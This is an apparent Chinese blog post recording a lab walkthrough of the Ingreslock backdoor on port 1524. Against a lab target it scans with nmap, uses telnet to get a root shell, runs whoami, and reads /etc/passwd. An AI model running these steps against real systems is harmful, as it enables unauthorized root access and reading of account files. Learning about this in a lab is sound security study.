Ingreslock后门漏洞

        找到工作后,学习时间少了很多,今天在学习时,发现了一个比较好玩的端口后门漏洞,就是1524端口漏洞,现在我把该过程记录下来。

1524端口简介:

服务:ingress 
说明:许多攻击脚本将安装一个后门SHELL于这个端口,尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图,很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口,看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。

目的:

利用Telnet命令链接目标主机的1524端口,直接获取root权限。

原理:

Ingreslock后门程序监听1524端口,连接到1524端口就可以直接获取root权限。

准备:

1.Kali系统版本2.0

2.攻击主机IP:192.168.1.2   靶机IP:192.168.1.3

实战:

Step1:扫描目标主机端口:在终端输入nmap -sV 192.168.1.3

Step2:连接目标主机:在终端输入telnet 192.168.1.3 1524

Step3:查找获取的权限:在终端输入whoami

Step4:查看主机密码文件:在终端输入cat  /etc/passwd

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值